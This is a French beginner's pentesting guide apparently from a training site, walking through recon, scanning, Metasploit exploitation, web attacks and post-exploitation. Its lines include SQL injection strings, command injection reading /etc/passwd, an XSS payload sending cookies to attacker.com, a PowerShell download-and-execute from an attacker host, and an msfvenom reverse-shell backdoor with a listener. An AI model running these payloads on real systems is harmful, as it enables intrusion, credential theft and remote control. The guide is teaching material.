Guide Complet du Pentesting : De Débutant à Expert
Guide exhaustif du test de pénétration pour débutants. Apprenez étape par étape les techniques, outils et méthodologies essentielles du pentesting, avec des exemples pratiques et des exercices.
InSkillCoach
Guide Complet du Pentesting : De Débutant à Expert
Introduction au Pentesting
Le pentesting (test de pénétration) est une pratique essentielle en cybersécurité qui consiste à évaluer la sécurité d’un système informatique en simulant des attaques contrôlées. Ce guide vous accompagnera pas à pas dans l’apprentissage du pentesting.
Prérequis et Installation
1. Configuration de l’Environnement
Installation de Kali Linux
# Téléchargement de Kali Linux
# 1. Visitez https://www.kali.org/downloads/
# 2. Téléchargez l'ISO
# Installation sur VirtualBox
1. Créez une nouvelle VM
2. Allouez au moins 2GB de RAM
3. 20GB d'espace disque
4. Montez l'ISO et installez
Configuration Initiale
# Mise à jour du système
sudo apt update
sudo apt upgrade -y
# Installation des outils essentiels
sudo apt install -y \
nmap \
wireshark \
metasploit-framework \
burpsuite \
dirb \
nikto
2. Premiers Pas avec Linux
Commandes Essentielles
# Navigation
ls # Liste les fichiers
cd # Change de répertoire
pwd # Affiche le répertoire actuel
# Manipulation de fichiers
cat # Affiche le contenu
nano # Éditeur de texte
chmod # Change les permissions
Phase 1 : Reconnaissance
1. Reconnaissance Passive
OSINT (Open Source Intelligence)
# Utilisation de whois
whois example.com
# DNS Lookup
dig example.com
nslookup example.com
# Google Dorks
site:example.com
filetype:pdf site:example.com
inurl:admin site:example.com
Outils de Reconnaissance
# Maltego
maltego &
# theHarvester
theHarvester -d example.com -b all
# Recon-ng
recon-ng
2. Reconnaissance Active
Scan de Ports avec Nmap
# Scan basique
nmap -sV target_ip
# Scan furtif
nmap -sS target_ip
# Scan complet avec scripts
nmap -sC -sV -p- target_ip -oN scan_results.txt
# Scan UDP
nmap -sU target_ip
Énumération des Services
# Énumération SMB
enum4linux target_ip
# Énumération Web
dirb http://target_ip
nikto -h http://target_ip
Phase 2 : Analyse des Vulnérabilités
1. Scan de Vulnérabilités
Utilisation de Nessus
- Installation de Nessus
# Téléchargement et installation
curl -O https://www.tenable.com/downloads/nessus
dpkg -i Nessus-*.deb
service nessusd start
- Configuration initiale
- Accédez à https://localhost:8834
- Créez un compte administrateur
- Configurez les scans
OpenVAS
# Installation
apt install openvas
gvm-setup
gvm-start
2. Analyse Web
Utilisation de Burp Suite
- Configuration du proxy
Proxy -> Options
- Interface: 127.0.0.1
- Port: 8080
- Configuration du navigateur
Firefox -> Préférences -> Réseau
- Paramètres proxy manuels
- SOCKS Host: 127.0.0.1
- Port: 8080
Tests d’Injection SQL
-- Test basique
' OR '1'='1
-- Test d'authentification
admin' --
admin' OR '1'='1'--
-- Test d'erreur
' UNION SELECT NULL--
Phase 3 : Exploitation
1. Metasploit Framework
Configuration Initiale
# Démarrage de Metasploit
msfconsole
# Mise à jour de la base de données
msfdb init
db_status
Utilisation Basique
# Recherche d'exploits
search ms17-010
# Configuration d'un exploit
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS target_ip
exploit
2. Exploitation Web
XSS (Cross-Site Scripting)
// Test basique
<script>alert('XSS')</script>
// Vol de cookies
<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>
// Test de DOM XSS
javascript:alert(document.domain)
Injection de Commandes
# Tests basiques
; ls
| cat /etc/passwd
`id`
$(whoami)
Phase 4 : Post-Exploitation
1. Élévation de Privilèges
Linux Privilege Escalation
# Énumération de base
id
uname -a
cat /etc/passwd
sudo -l
# Recherche de SUID
find / -perm -u=s -type f 2>/dev/null
# Kernel Exploits
searchsploit kernel version
Windows Privilege Escalation
# Énumération Windows
systeminfo
net user
whoami /priv
# PowerShell Empire
powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')
2. Maintien d’Accès
Création de Backdoors
# Msfvenom Payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=attacker_ip \
LPORT=4444 \
-f exe \
-o payload.exe
# Listener Metasploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit
Phase 5 : Documentation et Reporting
1. Documentation des Tests
Structure du Rapport
1. Résumé Exécutif
2. Méthodologie
3. Résultats Détaillés
- Vulnérabilités trouvées
- Preuves de concept
- Impact potentiel
4. Recommandations
5. Annexes techniques
2. Outils de Reporting
# Script de génération de rapport
def generate_report():
"""
Structure de base pour un rapport
"""
report = {
'executive_summary': [],
'findings': [],
'recommendations': [],
'technical_details': []
}
return report
Exercices Pratiques
1. Laboratoire Virtuel
- Installation de machines vulnérables
- Metasploitable
- DVWA
- WebGoat
2. Challenges Progressifs
- Reconnaissance basique
- Scan de ports
- Identification de services
- Exploitation simple
- Post-exploitation
Bonnes Pratiques et Éthique
1. Cadre Légal
- Obtention d’autorisations écrites
- Respect du périmètre défini
- Documentation des actions
2. Sécurité
- Isolation du laboratoire de test
- Chiffrement des données sensibles
- Nettoyage post-test
Ressources d’Apprentissage
1. Plateformes d’Entraînement
- HackTheBox
- TryHackMe
- VulnHub
- PortSwigger Web Security Academy
2. Certifications Recommandées
- CompTIA Security+
- CEH (Certified Ethical Hacker)
- OSCP (Offensive Security Certified Professional)
- PNPT (Practical Network Penetration Tester)
Conclusion
Le pentesting est un domaine vaste qui nécessite une pratique constante. Points clés à retenir :
- Commencez par les bases
- Pratiquez dans un environnement contrôlé
- Documentez tout
- Restez éthique et légal
- Continuez à apprendre
Note de Sécurité : Ce guide est destiné à des fins éducatives uniquement. Toutes les techniques doivent être pratiquées dans un environnement de laboratoire contrôlé et avec les autorisations appropriées.
À propos de InSkillCoach
Expert en formation et technologies
Coach spécialisé dans les technologies avancées et l'IA, porté par GNeurone Inc.
Certifications:
- AWS Certified Solutions Architect – Professional
- Certifications Google Cloud
- Microsoft Certified: DevOps Engineer Expert
- Certified Kubernetes Administrator (CKA)
- CompTIA Security+
Commentaires
Les commentaires sont alimentés par GitHub Discussions
Connectez-vous avec GitHub pour participer à la discussion